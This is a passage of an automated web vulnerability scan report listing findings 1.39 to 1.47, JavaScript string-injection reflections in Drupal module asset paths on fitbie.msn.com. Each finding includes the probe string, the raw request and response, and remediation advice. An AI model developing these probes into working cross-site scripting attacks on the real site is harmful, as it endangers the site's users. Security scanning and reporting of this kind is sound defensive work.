Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:08 +0000
ETag: "1297606688-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:09 GMT
Date: Sun, 13 Feb 2011 14:18:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all996e5';67a6405b09d?destination=node%2Fall996e5';67a6405b09d&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.39. http://fitbie.msn.com/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7db3d'%3b91672d1362 was submitted in the REST URL parameter 2. This input was echoed as 7db3d';91672d1362 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all7db3d'%3b91672d1362/modules/logintoboggan/logintoboggan.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:05 +0000
ETag: "1297606685-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:06 GMT
Date: Sun, 13 Feb 2011 14:18:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all7db3d';91672d1362?destination=node%2Fall7db3d';91672d1362&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.40. http://fitbie.msn.com/sites/all/modules/panels/css/panels.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/panels/css/panels.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2a39'%3b51b4fdaaf75 was submitted in the REST URL parameter 2. This input was echoed as a2a39';51b4fdaaf75 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/alla2a39'%3b51b4fdaaf75/modules/panels/css/panels.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/alla2a39';51b4fdaaf75?destination=node%2Falla2a39';51b4fdaaf75&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.41. http://fitbie.msn.com/sites/all/modules/panels/js/panels.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/panels/js/panels.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a5ab'%3b98304e784b4 was submitted in the REST URL parameter 2. This input was echoed as 8a5ab';98304e784b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all8a5ab'%3b98304e784b4/modules/panels/js/panels.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:09 +0000
ETag: "1297606689-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all8a5ab';98304e784b4?destination=node%2Fall8a5ab';98304e784b4&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.42. http://fitbie.msn.com/sites/all/modules/quicktabs/css/quicktabs.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/quicktabs/css/quicktabs.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ddd9'%3bf3ac3f7c6d4 was submitted in the REST URL parameter 2. This input was echoed as 3ddd9';f3ac3f7c6d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all3ddd9'%3bf3ac3f7c6d4/modules/quicktabs/css/quicktabs.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:08 +0000
ETag: "1297606688-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:09 GMT
Date: Sun, 13 Feb 2011 14:18:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all3ddd9';f3ac3f7c6d4?destination=node%2Fall3ddd9';f3ac3f7c6d4&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.43. http://fitbie.msn.com/sites/all/modules/quicktabs/js/quicktabs.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/quicktabs/js/quicktabs.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff054'%3b81e7412e45 was submitted in the REST URL parameter 2. This input was echoed as ff054';81e7412e45 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/allff054'%3b81e7412e45/modules/quicktabs/js/quicktabs.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:07 +0000
ETag: "1297606687-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:08 GMT
Date: Sun, 13 Feb 2011 14:18:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allff054';81e7412e45?destination=node%2Fallff054';81e7412e45&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.44. http://fitbie.msn.com/sites/all/modules/rodale/comments_ajax/comments_ajax.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/rodale/comments_ajax/comments_ajax.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6b66'%3b243f7e5f1cd was submitted in the REST URL parameter 2. This input was echoed as f6b66';243f7e5f1cd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/allf6b66'%3b243f7e5f1cd/modules/rodale/comments_ajax/comments_ajax.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:15 +0000
ETag: "1297606695-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:16 GMT
Date: Sun, 13 Feb 2011 14:18:16 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allf6b66';243f7e5f1cd?destination=node%2Fallf6b66';243f7e5f1cd&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.45. http://fitbie.msn.com/sites/all/modules/rodale/fit_tools/css/fit_tools.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/rodale/fit_tools/css/fit_tools.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad207'%3bdc09f024ad was submitted in the REST URL parameter 2. This input was echoed as ad207';dc09f024ad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/allad207'%3bdc09f024ad/modules/rodale/fit_tools/css/fit_tools.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:28 +0000
ETag: "1297607368-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:29 GMT
Date: Sun, 13 Feb 2011 14:29:29 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allad207';dc09f024ad?destination=node%2Fallad207';dc09f024ad&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.46. http://fitbie.msn.com/sites/all/modules/rodale/fit_tools/fit_tools.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/rodale/fit_tools/fit_tools.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7df1f'%3b65f3117e84 was submitted in the REST URL parameter 2. This input was echoed as 7df1f';65f3117e84 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all7df1f'%3b65f3117e84/modules/rodale/fit_tools/fit_tools.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:10 +0000
ETag: "1297606690-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all7df1f';65f3117e84?destination=node%2Fall7df1f';65f3117e84&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.47. http://fitbie.msn.com/sites/all/modules/rodale/fit_tools/tool_helper.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/rodale/fit_tools/tool_helper.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b351'%3b5ead8e0ecba was submitted in the REST URL parameter 2. This input was echoed as 8b351';5ead8e0ecba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all8b351'%3b5ead8e0ecba/modules/rodale/fit_tools/tool_helper.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:26 +0000
ETag: "1297607366-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:27 GMT
Date: Sun, 13 Feb 2011 14:29:27 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
